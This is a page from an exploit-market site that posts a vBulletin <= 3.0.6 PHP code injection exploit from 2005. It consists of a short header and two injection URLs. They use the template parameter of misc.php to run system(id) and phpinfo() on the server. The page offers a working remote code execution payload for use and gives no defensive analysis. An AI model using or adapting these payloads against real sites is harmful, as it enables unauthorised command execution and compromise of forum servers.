[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

vBulletin <= 3.0.6 php Code Injection

Author
pokley
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-72
Category
web applications
Date add
22-02-2005
Platform
unsorted
=====================================
vBulletin <= 3.0.6 php Code Injection
=====================================




# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}




#  0day.today [2024-12-24]  #